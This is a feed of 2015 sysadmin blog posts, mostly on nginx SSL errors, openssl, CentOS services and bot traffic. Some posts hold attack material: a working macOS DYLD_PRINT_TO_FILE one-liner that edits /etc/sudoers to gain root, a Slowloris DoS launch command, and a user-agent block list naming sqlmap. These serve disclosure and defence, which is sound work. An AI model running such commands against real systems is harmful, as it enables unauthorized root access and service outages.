nginx: [emerg] PEM_read_bio_X509("/etc/nginx/ssl/mydomain.tld/certificate.crt") failed (SSL: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:Type=X509_CINF error:0D08303A:asn1 encoding routines:ASN1_TEMPLATE_NOEXP_D2I:nested asn1 error:Field=cert_info, Type=X509 error:0906700D:PEM routines:PEM_ASN1_read_bio:ASN1 lib)

You should fix this by beginning to read the SSL certificate info via the CLI. Chances are, OpenSSL will also show you an error, to confirm your SSL certificate isn't valid.

In the example above, the SSL certificate is in /etc/nginx/ssl/mydomain.tld/certificate.crt, so the following examples continue to use that file.

$ openssl x509 -text -noout -in /etc/nginx/ssl/mydomain.tld/certificate.crt
unable to load certificate
139894337988424:error:0906D064:PEM routines:PEM_read_bio:bad base64 decode:pem_lib.c:818:

If that's your output, you have confirmation: your SSL certificate is corrupt. It's got unsupported ASCII characters, it's missing a part, some copy/paste error caused extra data to be present, ... Bottom line: your certificate file won't work.

You can test a few things yourself, like new line issues (linux vs. windows remains a problem). Open the file in binary mode in vi, and if you see ^M at end of every line, you've incorrectly got Windows new lines instead of Unix new lines.

$ vi -b /etc/nginx/ssl/mydomain.tld/certificate.crt

Remove all new lines and replace them with "normal" unix new lines (\n instead of \r\n).

If your SSL certificate file contains multiple certificates, like intermediate or CA root certificates, it's important to check each of them separately. You can check this by counting the "-----BEGIN CERTIFICATE-----" lines in the file.

If you've got multiple certificates, copy/paste each one to a different file and run the openssl example above. Each should give you valid output from the SSL certificate.

$ grep 'BEGIN CERTIFICATE' /etc/nginx/ssl/mydomain.tld/certificate.crt

The output above shows that the SSL Certificate file contains 3 individual SSL certificates. Copy/paste them all in separate files and validate if they work. If one of them gives you errors, fix that one: find the wrong ASCII characters, fix the new lines, check if you copy/pasted it correctly from your vendor, ...

The "nginx: [emerg] PEM_read_bio_X509″ error means your Nginx configuration is probably correct, it's the SSL certificate file itself that is invalid.

Nginx PEM_read_bio_X509_AUX: Expecting: TRUSTED CERTIFICATE

This is an error that is usually resolved very quickly. The certificate file you're pointing your config to, isn't a certificate file. At least, not according to Nginx.

$ service nginx configtest

nginx: [emerg] PEM_read_bio_X509_AUX("/etc/nginx/ssl/mydomain.tld/certificate.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line:Expecting: TRUSTED CERTIFICATE)
nginx: configuration file /etc/nginx/nginx.conf test failed

This can happen if you've accidentally swapped your private key and SSL certificate in either your files, or in the Nginx configuration.

Your Nginx config will contain these kind of lines for its SSL configuration.

ssl_certificate             /etc/nginx/ssl/mydomain.tld/certificate.crt;
ssl_certificate_key         /etc/nginx/ssl/mydomain.tld/certificate.key;

Check if the ssl_certificate file is indeed your SSL certificate and if the ssl_certificate_key is indeed your key. It's not uncommon to mix these up if you're in a hurry or distracted and save the wrong contents to the wrong file.

Nginx SSL_CTX_use_PrivateKey_file: bad base64 decode error

Another common error in Nginx configurations is the following one.

$ service nginx configtest

nginx: [emerg] SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/mydomain.tld/certificate.key") failed (SSL: error:0906D064:PEM routines:PEM_read_bio:bad base64 decode error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib)
nginx: configuration file /etc/nginx/nginx.conf test failed

Note how the Nginx SSL error points to the .key file this time. The problem is with the SSL key, not the SSL certificate.

This error indicates that the private key you pointed your configuration to, doesn't match the SSL Certificate.

You can validate whether private key and SSL certificate match by calculating their MD5 hash. If they don't match, you have to find either the right certificate or the right private key file.

One of them is wrong and needs to be replaced. With this error, it's impossible to know which one is wrong. Your best bet is to read the info from the SSL certificate, determine if that's the correct SSL certificate (check expiration date, SANs, Common Name, ...), and find the matching key (which should have been created when you generated your Certificate Signing Request, CSR).

The post Nginx SSL Certificate Errors: PEM_read_bio_X509_AUX, PEM_read_bio_X509, SSL_CTX_use_PrivateKey_file appeared first on

by Mattias Geniar at August 13, 2015 07:28 PM

The Hidden “Refresh” Menu in Chrome when Developer Tools Are Opened

The post The Hidden “Refresh” Menu in Chrome when Developer Tools Are Opened appeared first on

Aah, the things Reddit can teach you.

Turns out, if you have your Developer Tools open ("inspect element" on a page), there's a hidden right-click menu on the refresh button in Chrome.


It's probably not that useful, since you can just check the Disable cache option in the Network tab when you have the inspector open and have the same effect if you refresh the page.


But hey, as an ex-gamer, I appreciate easter eggs like these.

The post The Hidden “Refresh” Menu in Chrome when Developer Tools Are Opened appeared first on

by Mattias Geniar at August 13, 2015 03:31 PM

August 12, 2015

Mattias Geniar

Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds

The post Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds appeared first on

Several weeks ago, a vulnerability in Apple's logging implementation was discovered by Stefan Esser (known for the jailbreaks of your IOS devices). To this day, the vulnerability remains unpatched.

It's trivially simple to get a root account, once you have a normal system account on a Mac OSX system.

By default, sudo is protected by your account password.

$ sudo su -

However, if you abuse the DYLD_PRINT_TO_FILE vulnerability, you instantly get root.

$ id

$ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp <<< 'echo "$USER ALL=(ALL) NOPASSWD:ALL" >&3'; sudo -s

$ id
uid=0(root) gid=0(wheel)

A single one-liner that elevates your privileges and bypasses sudo altogether.

It's one thing that this happened. It's software, we expect bugs. It's quite another that this problem still isn't patched after weeks of the exploit being known in the wild.

The post Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds appeared first on

by Mattias Geniar at August 12, 2015 07:28 PM

Frank Goossens

The broken smartphone sequel

It’s been a almost a year since I last listed all smartphones that passed through my clumsy hands, so surely I must have some items to add to that list, you might think? Indeed! So starting off where we ended last year;

  1. 2014: Google Galaxy Nexus; 2nd hand replacement (a steal for only €95) with Cyanogenmod 11. Missed 4G, but loved the phone really. It just died on me within a week.
  2. 2014: ZTE Vec Blade 4G: no 2nd hand, 4G and not ridiculously expensive was what I was aiming for, so I bought the ZTE for just €170 and it was a very decent handset really. I sent it in for repairs under warranty mid 2015 after the power-button broke.
  3. 2015: Samsung Galaxy Ace2: much like the Galaxy Gio I used before a useable but underpowered small smartphone with an aging 2.x Android. But once one is used to it, there’s not a lot one cannot do with it (I typically want Firefox Mobile, WordFeud and a music player).
  4. 2015: back to the ZTE which was repaired perfectly, until after approx. a month it fell out of my pocket onto the ground, shattering the glass. I tried finding a shop to replace the glass, but ZTE being not that common I didn’t find one. So …
  5. 2015: Samsung Galaxy Core Prime VE: So I wanted a not-too-expensive big-brand phone (i.e. LG, Sony, Samsung or HTC) to have a better chance of getting it repaired outside of warranty, with 4G and a very recent Android-version (i.e. Lollipop) and that’s what the Galaxy Core Prime is about. I added a 16Gb class 10 SD-card and I bought a flip wallet case. Just to be safe I’ll go and buy a screen protector as well, because I am, as this list proves, not only spoiled but also clumsy.

by frank at August 12, 2015 03:22 PM

August 11, 2015

Mattias Geniar

Bind/Named Crash: REQUIRE(*name == ((void *)0)) failed, CVE-2015-5477

The post Bind/Named Crash: REQUIRE(*name == ((void *)0)) failed, CVE-2015-5477 appeared first on

A couple of weeks ago, a major bind (named) vulnerability was exposed. The denial-of-service vulnerability abused a flaw in the way TKEY DNS records were processed.

The TKEY vulnerability

A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)
Red Hat: CVE-2015-5477

Detecting CVE-2015-5477 in the wild

If you have bind nameservers running, you may see the following kind of logs appear in your syslog messages.

Aug  11 01:22:16 $server named[$pid]: message.c:2231: REQUIRE(*name == ((void *)0)) failed
Aug  11 01:22:16 $server named[$pid]: exiting (due to assertion failure)

And as a result, your bind nameserver will be dead.

$ service named status
named dead but subsys locked

Someone just sent a rogue TKEY packet to your server with the sole intent of crashing it.

Patching CVE-2015-5477

Patching is trivial, by now. This is the advantage of being late to the party, all major OS vendors have had their official packages updated.


$ yum update bind
$ service bind restart

On Debian/Ubuntu:

$ apt-get install bind9
$ service bind9 restart

And you're patched against CVE-2015-5477.

The post Bind/Named Crash: REQUIRE(*name == ((void *)0)) failed, CVE-2015-5477 appeared first on

by Mattias Geniar at August 11, 2015 04:12 AM

August 10, 2015

Mattias Geniar

How To Read The SSL Certificate Info From the CLI

The post How To Read The SSL Certificate Info From the CLI appeared first on

This guide will show you how to read the SSL Certificate Information from a text-file on your server or from a remote server by connecting to it with the OpenSSL client.

Read the SSL Certificate information from a text-file at the CLI

If you have your certificate file available to you on the server, you can read the contents with the openssl client tools.

By default, your certificate will look like this.

$ cat certificate.crt

Which doesn't really tell you much.

However, you can decrypt that certificate to a more readable form with the openssl tool.

$ openssl x509 -text -noout -in certificate.crt 

It will display the SSL certificate output like expiration date, common name, issuer, ...

Here's what it looks like for my own certificate.

$ openssl x509 -text -noout -in certificate.crt 

    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G2
            Not Before: Dec 16 20:01:40 2014 GMT
            Not After : Dec 16 20:01:40 2017 GMT
        Subject: C=BE, OU=Domain Control Validated,
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)

The openssl tools are a must-have when working with certificates on your Linux server.

Read the SSL Certificate information from a remote server

You may want to monitor the validity of an SSL certificate from a remote server, without having the certificate.crt text file locally on your server? You can use the same openssl for that.

To connect to a remote host and retrieve the public key of the SSL certificate, use the following command.

$ openssl s_client -showcerts -connect

This will connect to the host on port 443 and show the certificate. It's output looks like this.

$ openssl s_client -showcerts -connect

Server certificate
subject=/C=BE/OU=Domain Control Validated/
issuer=/C=BE/O=GlobalSign nv-sa/CN=AlphaSSL CA - SHA256 - G2

There's many more output, like the intermediate CA certificates, the raw certificates (encoded) and more information on the ciphers used to negotiate with the remote server.

You can use it to find the expiration date, to test for SSL connection errors, ...

The post How To Read The SSL Certificate Info From the CLI appeared first on

by Mattias Geniar at August 10, 2015 07:16 PM

Frank Goossens

Music from Our Tube; Gregory Porter’s musical roots

If you like Gregory Porter (and everybody seems to do so, with that “Liquid Spirit”-remix that gets huge airplay on all radio-stations here in Belgium) , you’ll absolutely love this;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Sixties socially engaged soul-jazz written by Gene McDaniels (do watch & listen him discuss the origins of the song) and performed by Les McCann & Eddie Harris at Jazz Montreux and released on the album “Swiss Movement“. And guess which album Gregory Porter would take with him on a desert island?

by frank at August 10, 2015 05:21 AM

August 09, 2015

Mattias Geniar

What happens to a new URL the first 10 minutes on the internet?

The post What happens to a new URL the first 10 minutes on the internet? appeared first on

If a URL is never indexed, and no one visits it, does it even exist?

These kind of existential nerd-questions make you wonder about virgin URLs. Do they even exist, URLs that have never been visited? And as a result, what exactly happens if you hit publish on your blog and send your freshly written words out onto the World Wide Web?

I'll dive deeper into the access logs and find out what happens in the first 10 minutes when a new URL is introduced onto the web.

Disclaimer: testing with a WordPress website

I'm testing with my own website, which is WordPress based. WordPress is pretty smart when it comes to publishing new posts, it pings the right search engines and social networks (if enabled) and lets the world know you have new written new content.

If you're writing this on a static site generator or just plain ol' HTML, your mileage may vary.

These tests were conducted without any social network pinging, I did leave the default "Update Services" list enabled. And as it turns out, that's a pretty damn long list.

The first 5 hits

You'll probably see these couple of hits as the first ones in your access logs:

  1. Your own: don't deny it, you're reading your blogpost again. Still doubting if your should have hit Publish after all.
  2. Tiny Tiny RSS hits: this self-hosted RSS reader is crazy popular. Chances are, you'll see quite a few of these hits, since every self-hosted TT-RSS does its own fetching.
  3. Crazy requests from OVH: this French hosting provider has a lot of servers. I can't tell why these hits even come, but they're masquerading as legit users with "valid" User-Agents. Pretty sure these are crawlers for some service, but haven't figured out which one.
  4. GoogleBot: within 10 minutes, Google will have come by and has indexed your newly written page.
  5. Feedburner & other RSS aggregators: since these all run automated, they are naturally your first visitors. Every RSS feed that's subscribed to your feed will come crawling by. Most of the popular ones have received a ping from WordPress to notify new content has been published.

The requests look like this.

$ tail -f access.log

You: "GET /your-url/ HTTP/1.1" 200 11395 "-" "Mozilla/5.0"

Tiny Tiny RSS feeds: "GET /your-url/ HTTP/1.1" 200 11250 "-" "Tiny Tiny RSS ("

Feedburner: "GET /your-url/?utm_source=feedburner&utm_medium=feed HTTP/1.1" 206 11250 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)"

GoogleBot "GET /your-url/ HTTP/1.1" 200 11250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +"

The first few hits aren't really special. The extravaganza comes in the next part.

Google is crazy fast

Considering the volume of data they process on a daily basis and the amount of search queries they get per second, it's hard to image there's room to index more.

After a single minute, the blogpost shows up as part of the Google+ social network search results.


And within 20 minutes, Google's "normal" search results have the page completely indexed.


This just blows my mind.

Social Sharing: Bot Heaven

You want to drive traffic to your new blog post, so you share it on your Facebook. And your Twitter. And LinkedIn. And Google+.

As soon as you share your new URL on social media, your server receives multiple HTTP requests in order to create a description, title and cover image for that social network.


Each of those services fetches your URL and means at least one HTTP call to get your content. Probably more, as they continue to fetch images, stylesheets, check your robots.txt, ...

  1. "Mozilla/5.0 (compatible; redditbot/1.0; +": the Reddit Bot, fetching an image + title suggestions.
  2. "Mozilla/5.0 (TweetmemeBot/4.0; +": yet another Twitter bot.
  3. "Twitterbot/1.0″: the actual twitter bot, used to create the Twitter Cards.
  4. "(Applebot/0.1; +": the Siri & Spotlight searchbot, soon to power the News App on IOS 9.
  5. "Google (+": Google's snippet generator for services like Google+.
  6. "facebookexternalhit/1.1 (+": Facebook fetching your URL to generate a preview in the News Feed.
  7. "Googlebot-Image/1.0": if your post contained images, this little bot just came by to index them. It's a separate request from the Googlebot that came by earlier.

Besides those well know bots, you'll see a flurry of bots you've never heard of or thought were extinct: Zemanta Aggregator, BingBot, Slackbot-LinkExpanding, MetaDataParser, BazQux, Apache-HttpClient (JAVA implementations for HTTP fetchers), Ahrefs Bot, BrandWatch bot, Baiduspider,, MJ12bot, YandexBot, FlipboardProxy, Lynx/Curl (for monitoring), ...

It's a bot party and everyone's invited!

Within 10 minutes, I had a total of 33 bots visit the new URL. Most of these I have never heard of.

There's No Such Thing As a Virgin URL

Checking my own access logs, I don't believe there are URLs that have never been visited.

They may not have been visited by real humans, but they've been indexed at least a dozen times. By services you don't know. That treat your data in ways you don't want to know.

It seems strange to have all these kind of services do their own indexing. Imagine the overhead and waste of bandwidth, CPU cycles and disk space each of these bots is consuming. Since most of them are offering competing services, they'll never work together and join forces.

The amount of bot crawling will only increase. On small to medium sized sites, the amount of bot crawling can exceed the regular visitors by a factor of 3x or 4x.

That means if Google Analytics is showing you an average of 1.000 pageviews a day, you can safely assume your server is handling 3.000 to 4.000 pageviews, just to serve the bots, RSS aggregators and link fetchers.

It's a crazy world we live in.

The post What happens to a new URL the first 10 minutes on the internet? appeared first on

by Mattias Geniar at August 09, 2015 07:57 PM

Block User-Agent in htaccess for Apache Webserver

The post Block User-Agent in htaccess for Apache Webserver appeared first on

This guide will show you how to block requests to your site if they come with a certain User-Agent. This can be very useful to fend of a WordPress pingback DDoS attack or block other unwanted requests.

Assuming .htaccess is already enabled on your server (it is on most servers running Apache), add the following near the very top to block this user-agent from accessing your site.

$ cat .htaccess
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_USER_AGENT} ^WordPress [NC]
  RewriteRule .* - [F,L]

The example above will block any request that has a User-Agent that starts with (the ^ regex modifier) "WordPress". I used this particular example to defend against a WordPress pingback attack, where old versions of WordPress are tricked into attacking a single target.

If you want to block multiple User-Agents in htaccess, you can combine them into a single line like this.

$ cat .htaccess
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_USER_AGENT} ^(WordPress|ApacheBench) [NC]
  RewriteRule .* - [F,L]

The example above blocks all requests with a User-Agent that starts with WordPress or ApacheBench.

Alternatively, you can use a SetEnvIfNoCase block, which sets an environment variable if the condition described is met. This can be useful if, for some reason, mod_rewrite isn't available.

$ cat .htaccess
<IfModule mod_setenvif.c>
  SetEnvIfNoCase User-Agent (sqlmap|wordpress|apachebench) bad_user_agents

  Order Allow,Deny
  Allow from all
  Deny from env=bad_user_agents

The example above will deny access to everyone that has a User-Agent that has either SQLMap, WordPress or ApacheBench in the string. It's case insensitive and the User-Agent does not have to start with that string, because it lacks the ^ modifier.

The post Block User-Agent in htaccess for Apache Webserver appeared first on

by Mattias Geniar at August 09, 2015 07:00 PM

Philip Van Hoof

Ik heb nog eens m’n steentje bijgedrage

Heb dit geyoutubed gisterenavond toen m’n duikclub was komen vlees op een rooster en gloeiende koolen verbranden. Oh met den Hans Teeuwen en de Theo Maassen zijn we ook aan’t lachen geweest. Na één uur de Geubels vond ik dat we ook eens andere komieken moeten laten zien aan de wereld. Duikers zijn een leutige bende. Een beetje zoals ons, neurdjes. Ik raad alle andere computermannekens aan om ook te gaan duiken. Toffe mensen.

Dit is niet de eerste keer dat ik dit filmpje blog. Maar ik zou graag meer Astronomers willen tegenkomen zodat we misschien effectief die planeet hier kunnen opkopen. En dan een gigantisch ruimteschip maken. Samen! Brand new world order 2.0. Or, shut the fuck up.

Daarnet nog een goed idee besproken met diene dat is blijven crashen. Ik wil hier in Rillaar toch ooit eens een zwembad zetten. Misschien moet ik er ééntje maken in de vorm van een schotel? Dan kunnen de duikers bij mij komen oefenen.

by admin at August 09, 2015 10:34 AM

August 08, 2015

Mattias Geniar

Effectively Using and Detecting The Slowloris HTTP DoS Tool

The post Effectively Using and Detecting The Slowloris HTTP DoS Tool appeared first on

I first mentioned Slowloris on this blog in 2009, more than 6 years ago. To this day, it's still a very effective attack on Apache servers.

How it works

Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. It's a SYN-flood attack, but aimed directly at Apache.

This is particularly nasty, because it won't show up in your webserver logs until a request has finished, and it's the design of Slowloris to never finish requests and just keep them open.

You won't detect slowloris in your logs, you have to use other tools to detect such an attack.

Starting a slowloris attack on Apache

Slowloris is a perl script, you can grab it from my mirrored github repo. Download the perl script and execute it.

$ ./ -dns -port 80 -timeout 2000 -num 750

The above will connect to on port 80 and attempt to make 750 connections to Apache and keep them open.

What it looks like on the server

To be on the receiving end of a Slowloris attack, you'll see the following.

If your apachectl status still works (it probably won't, because all your httpd processes will be busy), it will look like this.

$ apachectl status
   CPU Usage: u2.18 s.2 cu0 cs0 - .27% CPU load

   .817 requests/sec - 11.1 kB/second - 13.5 kB/request

   131 requests currently being processed, 2 idle workers


The symptoms are: very low CPU usage, a lot of Apache processes, very few new requests/s.

$ ps faux | grep httpd | wc -l

Slowloris works by making more and more requests, until it reaches your Apache's MaxClients limit.

In Apache 2.4, it looks like this.

$ tail -f /var/log/httpd/error.log
[mpm_prefork:error] [pid 7724] AH00161: server reached MaxRequestWorkers setting, consider raising the MaxRequestWorkers setting

For Apache 2.2, it looks like this.

$ tail -f /var/log/httpd/error.log
[error] server reached MaxClients setting, consider raising the MaxClients setting

The symptoms are always the same: MaxClients will be reached. It's how Slowloris prevents new connections from coming through.

What it looks like for a visitor of your site

Anyone trying to connect to your site, will have a "connecting" icon that keeps waiting forever.


The site won't load and your visitors will never get to see the content. If you have a webshop, you'll miss sales.

Identify the attacking IP address

You can detect the attack if you see such logs, but you don't know who started the attack: the source IP isn't logged until the HTTP requests are finished.

You can use netstat to list the most active IPs on your server. Slowloris may try to hide from the Apache service, but it can't hide from the network. Every request to Apache is still a connection to the server.

$ netstat -ntu -4 -6 |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' | sort | uniq -c | sort -n

The above will filter all IPs from your current server, order them and then count each unique occurence. You'll find the most often connected IPs at the bottom.

If you're running an old version of netstat (like CentOS 5.x versions), you may get an error like "netstat: invalid option --- 4". In that case, go for the following altered one-liner.

$ netstat -ntu |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' | sort | uniq -c | sort -n

The output looks like this.

$ netstat -ntu -4 -6 |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' | sort | uniq -c | sort -n
     40 186.2.xx.xx
    105 92.243.xx.xx

I had 105 connections from 92.243.xx.xx, which isn't normal for a webserver. Chances are, that's the one performing the Slowloris attack.

Blocking a Slowloris attack by blocking the IP

Once you've identified the IP, block it on your server. There's multiple ways to block an IP, like iptables, route, ip, ... I prefer the simple ip add syntax to blackhole an IP.

$ ip route add blackhole 92.243.xx.xx

Restart your Apache server, to clear all connections, and you should be good -- until the attacker switches IP.

$ service httpd restart
$ systemctl restart httpd

All systems go.

Preventing Slowloris attacks

Slowloris abuses a fundamental design flaw in the Event MPM of Apache. Each connection gets a thread. There isn't much to do about that.

To effectively prevent Slowloris, your best bet is to enable some kind of proxy between the client and your Apache webserver. Tools like Varnish, Nginx or HAProxy are perfect for this. Their server design is different and can handle a lot more connections than Apache.

If you have to stick to Apache, there are few choices for you:

To limit connections to port :80 from a single IP, use the following iptables rule.

$ iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 50 --connlimit-mask 20 -j DROP

The --connlimit-above 50 will allow at most 50 connections. The --connlimit-mask 20 groups IPs using that prefix length. Every IP from the same /20 network is subject to that 50 connection limit.

Tune those numbers as you see fit, increase the connection limits or decrease the prefix.

The post Effectively Using and Detecting The Slowloris HTTP DoS Tool appeared first on

by Mattias Geniar at August 08, 2015 07:39 PM

Start or Stop a Service on CentOS 7

The post Start or Stop a Service on CentOS 7 appeared first on

This post will show you how to start or stop a service on a RHEL or CentOS 7 server.

Check the state of the service on CentOS 7

To check the state, run systemctl status on your target service.

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)
   Active: active (running) since Fri 2015-07-31 22:26:29 CEST; 1 weeks 0 days ago
 Main PID: 27482 (httpd)
   Status: "Total requests: 0; Current requests/sec: 0; Current traffic:   0 B/sec"
   CGroup: /system.slice/httpd.service
           ├─ 1885 /usr/sbin/httpd -DFOREGROUND
           ├─ 1886 /usr/sbin/httpd -DFOREGROUND

There's quite a bit of output in systemctl, so let's break it down.

   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)

The enabled/disabled at the end tells you if the service is enabled/disabled to start on boot.

   Active: active (running) since Fri 2015-07-31 22:26:29 CEST; 1 weeks 0 days ago

The Active: output tells you the state of the service. It's actively running and was started 1 week ago.

 Main PID: 27482 (httpd)

This one explains itself, the main PID is 27482. This is the Apache2 webserver, so we'll see many child processes with Parent ID referring to this Main PID.

   Status: "Total requests: 0; Current requests/sec: 0; Current traffic:   0 B/sec"

The Status: output isn't available for every service. In the case of a webserver, it can show you throughput of the HTTP calls.

In the case of the MariaDB 10.0 service, it'll just show you the state of the service. Nothing more.

$ systemctl status mysql
mysql.service - LSB: start and stop MySQL
   Loaded: loaded (/etc/rc.d/init.d/mysql)
   Active: active (running) since Fri 2015-07-31 20:42:52 CEST; 1 weeks 1 days ago
   CGroup: /system.slice/mysql.service

The last part of the systemctl status output shows you the last lines of logs from that particular service.

Stop a service on CentOS 7

You stop a service with the systemctl stop command.

$ systemctl stop httpd

There's no additional output, you can still use systemctl status to verify the service stopped.

$ systemctl status httpd
   Active: inactive (dead) since Sat 2015-08-08 20:53:23 CEST; 25s ago
  Process: 28234 ExecStop=/bin/kill -WINCH ${MAINPID} (code=exited, status=0/SUCCESS)
 Main PID: 27482 (code=exited, status=0/SUCCESS)

The service is "inactive (dead)" and was cleanly shutdown ("code=exited, status=0″).

Alternatively, if you kill -9 a process, it'll show you that in the systemctl status output.

$ systemctl status httpd
  Process: 28465 ExecStart=/usr/sbin/httpd $OPTIONS -DFOREGROUND (code=killed, signal=KILL)
 Main PID: 28465 (code=killed, signal=KILL)

Useful output right there.

Start a service on CentOS 7

Like stopping a service, you can start a service with systemctl start.

$ systemctl start httpd

Again, no output, unless something went wrong. Use systemctl status to check the status of your service.

If you made an error in your service configuration, you get output like this.

$ systemctl start httpd
Job for httpd.service failed. See 'systemctl status httpd.service' and 'journalctl -xn' for details.

To see why the service failed to start, check the specific service logs. Systemd also has a way to output the info, but I find it cumbersome and sometimes lacking info -- the kind of info that's logged in additional error logs from the particular service.

$ systemctl status httpd
Aug 08 20:57:38 ma httpd[29986]: AH00526: Syntax error on line 14 of /etc/httpd/conf.d/something.conf:
Aug 08 20:57:38 ma httpd[29986]: Invalid command 'syntax', perhaps misspelled or defined by a module not included in the server configuration

If you get an error, fix it and try to start your service again.

The post Start or Stop a Service on CentOS 7 appeared first on

by Mattias Geniar at August 08, 2015 07:00 PM

Enable or Disable Service At Boot on CentOS 7

The post Enable or Disable Service At Boot on CentOS 7 appeared first on

This post will show you how to enable or disable a service to start on boot, on a RHEL or CentOS 7.

Check if the service starts on boot

You manage your services on RHEL/CentOS 7 through systemctl, the systemd service manager.

To check if a service starts on boot, run the systemctl status command on your service and check for the "Loaded" line.

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)

The last word, either enabled or disabled, will tell you if the service starts on boot. In the case above, the Apache2 webserver "httpd", it's Enabled.

Disabling a service on boot in CentOS 7

To disable, it's simply a matter of running systemctl disable on the desired service.

$ systemctl disable httpd
rm '/etc/systemd/system/'

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; disabled)

Running systemctl disable removes the symlink to the service in /etc/systemd/system/*. From now on, that service won't start on boot anymore.

Enabling a service on boot in CentOS 7

Very similar to disabling a service, you run systemctl enable on the target service.

$ systemctl enable httpd
ln -s '/usr/lib/systemd/system/httpd.service' '/etc/systemd/system/'

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)

The same symlink that was removed in the disable command above is recreated if you enable a service to start on boot.

Check which services failed to start on boot on CentOS 7

As a bonus, systemctl allows you to list all services that failed to start on boot, even though they were configured to start on boot.

$ systemctl --failed
kdump.service   loaded failed failed Crash recovery kernel arming
php-fpm.service loaded failed failed The PHP FastCGI Process Manager

LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.

In the example above, the kdump and php-fpm service failed to start on boot. If that's the case, you may want to check the startup scripts or its dependencies (maybe they depend on another service being up first?).

The post Enable or Disable Service At Boot on CentOS 7 appeared first on

by Mattias Geniar at August 08, 2015 06:40 PM

Wouter Verhelst

Backing up with tar

The tape archiver, better known as tar, is one of the older backup programs in existence.

It's not very good at automated incremental backups (for which bacula is a good choice), but it can be useful for "let's take a quick snapshot of the current system" type of situations.

As I'm preparing to head off to debconf tomorrow, I'm taking a backup of my n-1 laptop (which still contains some data that I don't want to lose) so it can be reinstalled and used by the Debconf video team. While I could use a "proper" backup system, running tar to a large hard disk is much easier.

By default, however, tar won't preserve everything, so it is usually a good idea to add some extra options. This is what I' mrunning currently:

sudo tar cvpaSf player.local:carillon.tgz --rmt-command=/usr/sbin/rmt --one-file-system /

which breaks down to create tar archive, verbose output, preserve permissions, automatically determine compression based on file extension, handle Sparse files efficiently, write to a file on a remote host using /usr/sbin/rmt as the rmt program, don't descend into a separate filesystem (since I don't want /proc and /sys etc to be backed up), and back up my root partition.

Since I don't believe there's any value to separate file systems on a laptop, this will back up the entire contents of my n-1 laptop to the carillon.tgz in my home directory on player.local.

August 08, 2015 08:45 AM

August 07, 2015

Frank Goossens

Why Autoptimize doesn’t touch non-local CSS/JS

Earlier today I got this question on the support forum for Autoptimize;

Will there be Google fonts support in the future? I now include the google font’s like this:

wp_enqueue_style( 'google-fonts', '//,600italic,400,700,600|Varela+Round' );

Is it possible to add this css to the combined and minified by this plugin file?

The basic question if Autoptimize can aggregate external resources has been asked before and I felt it was time to dig in.

I did a little test, requesting the same Google Font CSS, changing browser user agents. For my good ole Firefox on Ubuntu Linux I got (snippet);
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: local('Open Sans'), local('OpenSans'), url( format('woff2'), url( format('woff');

Whereas the exact same request with an MSIE7 useragent gives (again, extract);
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: url(;

It’s not surprising Google has specific CSS based on browser useragent (probably browser-version), but this is a simple example of how dynamic remote CSS or JS can be (the scala of variables that could lead to 3rd parties serving up different CSS/JS is huge, really).

So although theoretically it would be possible to have AO cache remote JS/CSS (such as Google Font’s) and include it in the aggregated CSS- or JS-file (and that way removing render blocking resources), the problem is that AO will never be able to apply whatever logic the 3rd party applies when getting requests. Hence the design decision (made by the original developer, Turl, a long long time ago) not to aggregate & minify external resources. This is how it should be.

by frank at August 07, 2015 04:50 PM

August 06, 2015

Mattias Geniar

Monitor All HTTP Requests (like TCPdump) On a Linux Server with httpry

The post Monitor All HTTP Requests (like TCPdump) On a Linux Server with httpry appeared first on

Wouldn't it be really cool if you could run a tool like tcpdump and see all HTTP requests flowing over the network, in a readable form?

Because let's be honest, something like this is far from readable.

$ tcpdump -i eth0 port 80 -A
20:56:08.793822 IP > Flags [S], seq 1641176060, win 65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 1225415667 ecr 0,sackOK,eol], length 0

It tells you that something is flowing over the wire, but you sure as hell can't read what is going over it. You recognise keywords, but that's it.

There are tools out there that do a better job, like httpry.

It's been around long enough to be present in most repositories on Linux servers by now. Install it via your package manager of choice.

$ yum install httpry
$ apt-get install httpry

After you have it installed, you can run it on your server and sniff for HTTP calls.

